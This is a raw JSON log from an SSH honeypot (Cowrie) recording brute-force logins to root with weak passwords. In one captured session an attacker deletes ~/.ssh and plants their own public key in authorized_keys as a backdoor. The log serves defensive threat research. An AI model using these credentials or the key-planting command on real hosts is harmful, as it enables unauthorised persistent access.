{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":56174,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ec0044efde7","protocol":"ssh","message":"New connection: 201.148.180.50:56174 (1.2.3.4:22) [session: 7ec0044efde7]","sensor":"my-vps","timestamp":"2025-08-31T06:08:42.682728Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48272,"dst_ip":"1.2.3.4","dst_port":22,"session":"5df0c4b78a0b","protocol":"ssh","message":"New connection: 212.227.235.229:48272 (1.2.3.4:22) [session: 5df0c4b78a0b]","sensor":"my-vps","timestamp":"2025-08-31T06:08:42.820697Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:08:42.821634Z","src_ip":"212.227.235.229","session":"5df0c4b78a0b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:08:43.104971Z","src_ip":"212.227.235.229","session":"5df0c4b78a0b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:08:43.890418Z","src_ip":"201.148.180.50","session":"7ec0044efde7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:08:43.891162Z","src_ip":"201.148.180.50","session":"7ec0044efde7"}
{"eventid":"cowrie.login.success","username":"root","password":"System@123","message":"login attempt [root/System@123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:08:44.279362Z","src_ip":"212.227.235.229","session":"5df0c4b78a0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:08:45.261065Z","src_ip":"212.227.235.229","session":"5df0c4b78a0b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:08:45.261829Z","src_ip":"212.227.235.229","session":"5df0c4b78a0b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:08:45.263041Z","src_ip":"212.227.235.229","session":"5df0c4b78a0b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:45.548396Z","src_ip":"212.227.235.229","session":"5df0c4b78a0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:08:46.135586Z","src_ip":"212.227.235.229","session":"5df0c4b78a0b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:08:46.136276Z","src_ip":"212.227.235.229","session":"5df0c4b78a0b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:08:46.422534Z","src_ip":"212.227.235.229","session":"5df0c4b78a0b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:46.423419Z","src_ip":"212.227.235.229","session":"5df0c4b78a0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48278,"dst_ip":"1.2.3.4","dst_port":22,"session":"4dda385a1189","protocol":"ssh","message":"New connection: 212.227.235.229:48278 (1.2.3.4:22) [session: 4dda385a1189]","sensor":"my-vps","timestamp":"2025-08-31T06:08:46.704953Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:08:46.705621Z","src_ip":"212.227.235.229","session":"4dda385a1189"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:08:46.989818Z","src_ip":"212.227.235.229","session":"4dda385a1189"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:08:48.171173Z","src_ip":"212.227.235.229","session":"4dda385a1189"}
{"eventid":"cowrie.login.success","username":"root","password":"2017","message":"login attempt [root/2017] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:08:49.020491Z","src_ip":"201.148.180.50","session":"7ec0044efde7"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:49.458040Z","src_ip":"212.227.235.229","session":"4dda385a1189"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44478,"dst_ip":"1.2.3.4","dst_port":22,"session":"e1fd24eaf1e9","protocol":"ssh","message":"New connection: 212.227.235.229:44478 (1.2.3.4:22) [session: e1fd24eaf1e9]","sensor":"my-vps","timestamp":"2025-08-31T06:08:49.741504Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:08:49.742386Z","src_ip":"212.227.235.229","session":"e1fd24eaf1e9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:08:50.028968Z","src_ip":"212.227.235.229","session":"e1fd24eaf1e9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:08:51.205604Z","src_ip":"212.227.235.229","session":"e1fd24eaf1e9"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:51.491529Z","src_ip":"212.227.235.229","session":"e1fd24eaf1e9"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:51.492607Z","src_ip":"212.227.235.229","session":"5df0c4b78a0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:08:51.737900Z","src_ip":"201.148.180.50","session":"7ec0044efde7"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-31T06:08:51.738604Z","src_ip":"201.148.180.50","session":"7ec0044efde7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:52.838843Z","src_ip":"201.148.180.50","session":"7ec0044efde7"}
{"eventid":"cowrie.session.closed","duration":"10.2","message":"Connection lost after 10.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:52.840017Z","src_ip":"201.148.180.50","session":"7ec0044efde7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60490,"dst_ip":"1.2.3.4","dst_port":22,"session":"75014756d1b0","protocol":"ssh","message":"New connection: 212.227.125.160:60490 (1.2.3.4:22) [session: 75014756d1b0]","sensor":"my-vps","timestamp":"2025-08-31T06:08:56.298548Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:08:56.547043Z","src_ip":"212.227.125.160","session":"75014756d1b0"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-31T06:08:56.547738Z","src_ip":"212.227.125.160","session":"75014756d1b0"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:57.450242Z","src_ip":"212.227.125.160","session":"75014756d1b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60500,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f335b6bf5c0","protocol":"ssh","message":"New connection: 212.227.125.160:60500 (1.2.3.4:22) [session: 3f335b6bf5c0]","sensor":"my-vps","timestamp":"2025-08-31T06:08:57.656333Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:08:57.906648Z","src_ip":"212.227.125.160","session":"3f335b6bf5c0"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-31T06:08:57.907998Z","src_ip":"212.227.125.160","session":"3f335b6bf5c0"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:08:58.816498Z","src_ip":"212.227.125.160","session":"3f335b6bf5c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60514,"dst_ip":"1.2.3.4","dst_port":22,"session":"70c17b8e4ed4","protocol":"ssh","message":"New connection: 212.227.125.160:60514 (1.2.3.4:22) [session: 70c17b8e4ed4]","sensor":"my-vps","timestamp":"2025-08-31T06:08:59.005977Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:08:59.277725Z","src_ip":"212.227.125.160","session":"70c17b8e4ed4"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-31T06:08:59.278417Z","src_ip":"212.227.125.160","session":"70c17b8e4ed4"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:00.178269Z","src_ip":"212.227.125.160","session":"70c17b8e4ed4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:09:01.097306Z","src_ip":"212.227.235.229","session":"3ce8d6413c3a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:09:01.097985Z","src_ip":"212.227.235.229","session":"3ce8d6413c3a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58372,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f2c407c1dd3","protocol":"ssh","message":"New connection: 212.227.235.229:58372 (1.2.3.4:22) [session: 0f2c407c1dd3]","sensor":"my-vps","timestamp":"2025-08-31T06:09:01.853503Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:09:01.854791Z","src_ip":"212.227.235.229","session":"0f2c407c1dd3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:09:02.124438Z","src_ip":"212.227.235.229","session":"0f2c407c1dd3"}
{"eventid":"cowrie.login.failed","username":"minikube","password":"minikube","message":"login attempt [minikube/minikube] failed","sensor":"my-vps","timestamp":"2025-08-31T06:09:03.244818Z","src_ip":"212.227.235.229","session":"0f2c407c1dd3"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:09:04.516589Z","src_ip":"212.227.235.229","session":"0f2c407c1dd3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33574,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf25946d2fb3","protocol":"ssh","message":"New connection: 212.227.235.229:33574 (1.2.3.4:22) [session: cf25946d2fb3]","sensor":"my-vps","timestamp":"2025-08-31T06:09:05.272019Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:09:07.036392Z","src_ip":"212.227.235.229","session":"cf25946d2fb3"}
